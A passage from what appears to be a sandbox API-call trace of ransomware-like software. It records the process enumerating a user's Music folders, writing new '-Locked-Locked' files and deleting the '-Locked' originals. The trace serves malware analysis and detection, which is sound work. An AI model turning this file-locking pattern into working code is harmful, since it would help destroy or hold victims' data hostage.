lpFindFileData=0x1aeec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351481e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351481e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351481e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzU_ 4bXy7iRPpZe1.mp3-Locked", cAlternateFileName="AZU_4B~2.MP3")) returned 1 [0307.042] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WyJ", cAlternateFileName="")) returned 1 [0307.042] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeec0 | out: lpFindFileData=0x1aeec0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.042] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af148) returned 1 [0307.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0307.042] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked-Locked", lpFilePart=0x0) returned 0x45 [0307.042] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af034) returned 1 [0307.042] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\azu_ 4bxy7irppze1.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.084] GetFileType (hFile=0x49c) returned 0x1 [0307.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af030) returned 1 [0307.084] GetFileType (hFile=0x49c) returned 0x1 [0307.086] CloseHandle (hObject=0x49c) returned 1 [0307.086] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked", lpFilePart=0x0) returned 0x3e [0307.087] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\AzU_ 4bXy7iRPpZe1.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\azu_ 4bxy7irppze1.mp3-locked")) returned 1 [0307.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0307.088] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0307.088] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", lpFilePart=0x0) returned 0x26 [0307.088] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2rPx", cAlternateFileName="")) returned 1 [0307.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e914e10, ftCreationTime.dwHighDateTime=0x1d7dd1a, ftLastAccessTime.dwLowDateTime=0xda44a240, ftLastAccessTime.dwHighDateTime=0x1d7e0c1, ftLastWriteTime.dwLowDateTime=0xda44a240, ftLastWriteTime.dwHighDateTime=0x1d7e0c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6a46cyIDWw1W7", cAlternateFileName="6A46CY~1")) returned 1 [0307.089] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35172c8e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35172c8e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35172c8e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8fm6xuzqvhnSj5.m4a-Locked", cAlternateFileName="M8FM6X~2.M4A")) returned 1 [0307.090] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3517a180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3517a180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3517a180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCAKqI8YUum4ME.m4a-Locked", cAlternateFileName="PCAKQI~2.M4A")) returned 1 [0307.090] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35182a49, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35182a49, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35182a49, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T3x5b8zSJkixwc2ut.m4a-Locked", cAlternateFileName="T3X5B8~2.M4A")) returned 1 [0307.090] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351a26ab, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351a26ab, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351a26ab, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3-Locked", cAlternateFileName="YH5CY7~2.MP3")) returned 1 [0307.090] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0307.090] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0307.091] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0307.091] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af140) returned 1 [0307.091] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aec48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0307.091] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", nBufferLength=0x105, lpBuffer=0x1aec1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", lpFilePart=0x0) returned 0x26 [0307.091] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\*", lpFindFileData=0x1aee68 | out: lpFindFileData=0x1aee68*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x351b37b3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351b37b3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2rPx", cAlternateFileName="")) returned 1 [0307.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e914e10, ftCreationTime.dwHighDateTime=0x1d7dd1a, ftLastAccessTime.dwLowDateTime=0xda44a240, ftLastAccessTime.dwHighDateTime=0x1d7e0c1, ftLastWriteTime.dwLowDateTime=0xda44a240, ftLastWriteTime.dwHighDateTime=0x1d7e0c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6a46cyIDWw1W7", cAlternateFileName="6A46CY~1")) returned 1 [0307.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35172c8e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35172c8e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35172c8e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8fm6xuzqvhnSj5.m4a-Locked", cAlternateFileName="M8FM6X~2.M4A")) returned 1 [0307.092] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3517a180, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3517a180, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3517a180, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCAKqI8YUum4ME.m4a-Locked", cAlternateFileName="PCAKQI~2.M4A")) returned 1 [0307.093] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35182a49, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35182a49, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35182a49, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="T3x5b8zSJkixwc2ut.m4a-Locked", cAlternateFileName="T3X5B8~2.M4A")) returned 1 [0307.093] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351a26ab, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351a26ab, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351a26ab, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3-Locked", cAlternateFileName="YH5CY7~2.MP3")) returned 1 [0307.093] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee78 | out: lpFindFileData=0x1aee78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351a26ab, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351a26ab, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351a26ab, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3-Locked", cAlternateFileName="YH5CY7~2.MP3")) returned 0 [0307.093] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0307.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af100) returned 1 [0307.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af10c) returned 1 [0307.094] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked-Locked", lpFilePart=0x0) returned 0x47 [0307.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefec) returned 1 [0307.094] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\m8fm6xuzqvhnsj5.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.095] GetFileType (hFile=0x49c) returned 0x1 [0307.095] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefe8) returned 1 [0307.095] GetFileType (hFile=0x49c) returned 0x1 [0307.096] CloseHandle (hObject=0x49c) returned 1 [0307.097] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked", lpFilePart=0x0) returned 0x40 [0307.097] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\m8fm6xuzqvhnsj5.m4a-locked")) returned 1 [0307.097] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked-Locked", lpFilePart=0x0) returned 0x46 [0307.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefec) returned 1 [0307.098] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\pcakqi8yuum4me.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.098] GetFileType (hFile=0x49c) returned 0x1 [0307.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefe8) returned 1 [0307.098] GetFileType (hFile=0x49c) returned 0x1 [0307.100] CloseHandle (hObject=0x49c) returned 1 [0307.100] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked", lpFilePart=0x0) returned 0x3f [0307.100] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\pcakqi8yuum4me.m4a-locked")) returned 1 [0307.101] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked-Locked", lpFilePart=0x0) returned 0x49 [0307.101] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefec) returned 1 [0307.101] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\t3x5b8zsjkixwc2ut.m4a-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.101] GetFileType (hFile=0x49c) returned 0x1 [0307.101] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefe8) returned 1 [0307.101] GetFileType (hFile=0x49c) returned 0x1 [0307.103] CloseHandle (hObject=0x49c) returned 1 [0307.103] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked", lpFilePart=0x0) returned 0x42 [0307.103] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\t3x5b8zsjkixwc2ut.m4a-locked")) returned 1 [0307.104] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeaf8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked-Locked", lpFilePart=0x0) returned 0x4c [0307.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aefec) returned 1 [0307.104] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\yh5cy7z6vtc s nbxy-e.mp3-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0307.105] GetFileType (hFile=0x49c) returned 0x1 [0307.105] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aefe8) returned 1 [0307.105] GetFileType (hFile=0x49c) returned 0x1 [0307.106] CloseHandle (hObject=0x49c) returned 1 [0307.107] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aec78, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked", lpFilePart=0x0) returned 0x45 [0307.107] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\yh5cy7z6vtc s nbxy-e.mp3-locked")) returned 1 [0307.107] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0f8) returned 1 [0307.107] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0307.107] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", nBufferLength=0x105, lpBuffer=0x1aebd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", lpFilePart=0x0) returned 0x2b [0307.108] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\*", lpFindFileData=0x1aee20 | out: lpFindFileData=0x1aee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0307.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x352ebfeb, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352ebfeb, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0307.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x351ea686, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x351ea686, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x351ea686, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="D3Q e1suI.m4a-Locked", cAlternateFileName="D3QE1S~2.M4A")) returned 1 [0307.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35205459, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35205459, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35205459, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="enT 3CCOSpQ2.mp3-Locked", cAlternateFileName="ENT3CC~2.MP3")) returned 1 [0307.108] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee30 | out: lpFindFileData=0x1aee30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x352300c1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x352300c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x352300c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="F4vRoPo.wav-Locked", cAlternateFileName="F4VROP~1.WAV")) returned 1 [0307.109] FindNextFileW (in: hFindFile=0x737a28, 